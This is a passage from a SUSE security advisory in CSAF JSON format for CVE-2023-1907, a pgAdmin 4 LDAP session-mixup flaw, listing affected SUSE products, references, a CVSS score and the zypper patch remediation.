"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Manager Proxy 4.3",
"product_id": "SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Manager Proxy 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Manager Proxy 4.3",
"product_id": "SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Manager Proxy 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Manager Proxy 4.3",
"product_id": "SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Manager Proxy 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Server 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x as component of SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.s390x",
"relates_to_product_reference": "SUSE Manager Server 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Manager Server 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Manager Server 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Manager Server 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-1907",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-1907"
}
],
"notes": [
{
"category": "general",
"text": "A vulnerability was found in pgadmin. Users logging into pgAdmin running in server mode using LDAP authentication may be attached to another user\u0027s session if multiple connection attempts occur simultaneously.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-1907",
"url": "https://www.suse.com/security/cve/CVE-2023-1907"
},
{
"category": "external",
"summary": "SUSE Bug 1234840 for CVE-2023-1907",
"url": "https://bugzilla.suse.com/1234840"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
